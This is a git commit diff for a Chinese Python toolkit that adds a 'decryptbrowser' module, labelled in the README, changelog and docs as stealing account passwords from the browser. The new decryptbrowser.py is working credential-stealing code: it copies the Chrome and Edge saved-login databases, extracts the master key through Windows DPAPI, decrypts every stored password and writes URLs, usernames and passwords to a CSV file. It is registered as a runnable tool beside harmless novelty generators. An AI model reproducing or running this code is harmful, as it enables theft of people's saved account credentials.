bump to v0.1.21, support decryptbrowser

README.md

@@ -59,6 +59,7 @@ You can star this repository to keep track of the project if it's helpful for yo
 |   sovietgenerator                    |     [click](https://mp.weixin.qq.com/s/PUTJxDLpCVRSaUzvarizEQ)    |      [click](./pytools/modules/sovietgenerator)           |     苏联笑话生成器                |
 |   goodgoodgenerator                  |     [click](https://mp.weixin.qq.com/s/mH9LyIdHe1uX2E3oAjlIoQ)    |      [click](./pytools/modules/goodgoodgenerator)         |     稳中向好生成器                |
 |   tianyancha                         |     [click](https://mp.weixin.qq.com/s/IpaOCq1600JyIf9QWieoTQ)    |      [click](./pytools/modules/tianyancha)                |     天眼查                        |
+|   decryptbrowser                     |     [click]()                                                     |      [click](./pytools/modules/decryptbrowser)            |     盗取浏览器里的账号密码        |
 
 
 # Install
@@ -114,6 +115,7 @@ tool_client.execute(random.choice(list(all_supports.values())))
 - [DataAnalysis](https://github.com/CharlesPikachu/dataanalysis): Some data analysis projects in charles_pikachu.
 - [Imagedl](https://github.com/CharlesPikachu/imagedl): Search and download images from specific websites.
 - [Pytoydl](https://github.com/CharlesPikachu/pytoydl): A toy deep learning framework built upon numpy.
+- [NovelDL](https://github.com/CharlesPikachu/noveldl): Search and download novels from some specific websites.
 
 
 # More

docs/Changelog.md

@@ -73,4 +73,9 @@
 **2022-05-06**
 
 - 版本号: v0.1.19-v0.1.20, 
-- 更新内容: 支持天眼查。
+- 更新内容: 支持天眼查。
+
+**2022-05-09**
+
+- 版本号: v0.1.21, 
+- 更新内容: 支持盗取浏览器里的账号密码。

docs/Quickstart.md

@@ -953,6 +953,33 @@ tool_client.execute('tianyancha')
 }
 ```
 
+#### 盗取浏览器里的账号密码
+
+**1.公众号文章链接** 
+
+[点击查看]()
+
+**2.功能介绍**
+
+盗取浏览器里的账号密码。
+
+**3.调用示例代码**
+
+```python
+from pytools import pytools
+
+tool_client = pytools.pytools()
+tool_client.execute('decryptbrowser')
+```
+
+**4.config中支持的参数**
+
+```
+{
+    savename: 保存盗取的账号密码的文件名, 默认值为"results.csv",
+}
+```
+
 
 ## 随机运行一个小程序
 

docs/Recommend.md

@@ -35,3 +35,5 @@
 - [图片下载器](https://github.com/CharlesPikachu/imagedl)
 
 - [从零开始实现一个深度学习框架](https://github.com/CharlesPikachu/pytoydl)
+
+- [小说下载器](https://github.com/CharlesPikachu/noveldl)

pytools/__init__.py

@@ -5,7 +5,7 @@
 '''url'''
 __url__ = 'https://github.com/CharlesPikachu/pytools'
 '''version'''
-__version__ = '0.1.20'
+__version__ = '0.1.21'
 '''author'''
 __author__ = 'Charles'
 '''email'''

pytools/modules/__init__.py

@@ -15,6 +15,7 @@
 from .portscanner import PortScanner
 from .playfireworks import PlayFireworks
 from .emailsecurity import EmailSecurity
+from .decryptbrowser import DecryptBrowser
 from .earthwallpaper import EarthWallpaper
 from .computersinger import ComputerSinger
 from .inquiryexpress import InquiryExpress

pytools/modules/decryptbrowser/__init__.py

@@ -0,0 +1,2 @@
+'''初始化'''
+from .decryptbrowser import DecryptBrowser

pytools/modules/decryptbrowser/decryptbrowser.py

@@ -0,0 +1,94 @@
+'''
+Function:
+    盗取浏览器里的账号密码
+Author:
+    Charles
+微信公众号:
+    Charles的皮卡丘
+'''
+import os
+import csv
+import json
+import shutil
+import base64
+import sqlite3
+
+
+'''盗取浏览器里的账号密码'''
+class DecryptBrowser():
+    tool_name = '盗取浏览器里的账号密码'
+    def __init__(self, savename='results.csv'):
+        self.csv_heads = ['url', 'username', 'password']
+        self.write_heads_flag = False
+        self.savename = savename
+    '''运行'''
+    def run(self):
+        self.fetch()
+    '''获取数据库的数据'''
+    def fetch(self):
+        # Chrome浏览器
+        if os.path.isfile(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State'):
+            print('[INFO]: 正在获取Chrome浏览器中的敏感数据')
+            target_db_path = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'
+            shutil.copy2(target_db_path, 'temp')
+            self.readdb('temp', self.getmasterkey(r'AppData\Local\Google\Chrome\User Data\Local State'))
+            self.delfile('temp')
+            print(f'[INFO]: 获取Chrome浏览器中的敏感数据成功, 数据保存在{self.savename}')
+        # Edge浏览器
+        if os.path.isfile(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Microsoft\Edge\User Data\Local State'):
+            print('[INFO]: 正在获取Edge浏览器中的敏感数据')
+            target_db_path = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Microsoft\Edge\User Data\Default\Login Data'
+            shutil.copy2(target_db_path, 'temp')
+            self.readdb('temp', self.getmasterkey(r'AppData\Local\Microsoft\Edge\User Data\Local State'))
+            self.delfile('temp')
+            print(f'[INFO]: 获取Edge浏览器中的敏感数据成功, 数据保存在{self.savename}')
+    '''读取数据库数据'''
+    def readdb(self, dbpath, master_key):
+        sql = 'SELECT origin_url, username_value, password_value, date_created, date_last_used FROM logins;'
+        client = sqlite3.connect(dbpath)
+        cursor = client.cursor()
+        with open(self.savename, 'a', newline='', encoding='utf-8-sig') as csv_file:
+            cursor.execute(sql)
+            csv_writer = csv.writer(csv_file, dialect=('excel'))
+            if not self.write_heads_flag:
+                csv_writer.writerow(self.csv_heads)
+                self.write_heads_flag = True
+            info = []
+            for row in cursor.fetchall():
+                for idx in range(len(self.csv_heads)):
+                    if isinstance(row[idx], bytes):
+                        info.append(self.decrypt(row[idx], master_key))
+                    else:
+                        info.append(row[idx])
+                csv_writer.writerow(info)
+                info = []
+        cursor.close()
+        client.close()
+    '''删除文件'''
+    def delfile(self, filename='temp'):
+        try:
+            os.remove('temp')
+        except:
+            pass
+    '''解码'''
+    def decrypt(self, value, master_key):
+        if value[:3] == b'v10':
+            from Crypto.Cipher import AES
+            iv, payload = value[3:15], value[15:]
+            cipher = AES.new(master_key, AES.MODE_GCM, iv)
+            decrypted_value = cipher.decrypt(payload)
+            decrypted_value = decrypted_value[:-16].decode()
+        else:
+            import win32crypt
+            decrypted_value = win32crypt.CryptUnprotectData(value)[1].decode()
+        return decrypted_value
+    '''获得master key'''
+    def getmasterkey(self, local_state_path):
+        import win32crypt
+        with open(os.environ['USERPROFILE'] + os.sep + local_state_path, 'r', encoding='utf-8') as fp:
+            local_state = fp.read()
+            local_state = json.loads(local_state)
+        master_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])
+        master_key = master_key[5:]
+        master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
+        return master_key

pytools/pytools.py

@@ -51,7 +51,7 @@ def initialize(self):
             'iplocationquery': IPLocationQuery, 'genderpredictor': GenderPredictor, 'qrcodegenerator': QRCodeGenerator, 'coupletgenerator': CoupletGenerator,
             'artsigngenerator': ArtSignGenerator, 'controlpcbyemail': ControlPCbyEmail, 'naughtyconfession': NaughtyConfession, 'luxunsentencesquery': LuxunSentencesQuery,
             'hubbleseeonbirthday': HubbleSeeOnBirthday, 'newyearcardgenerator': NewYearCardGenerator, 'trumptweetsgenerator': TrumpTweetsGenerator, 'sovietgenerator': SovietGenerator,
-            'goodgoodgenerator': GoodGoodGenerator, 'tianyancha': Tianyancha,
+            'goodgoodgenerator': GoodGoodGenerator, 'tianyancha': Tianyancha, 'decryptbrowser': DecryptBrowser,
         }
         return supported_tools
     '''获得所有支持的tools信息'''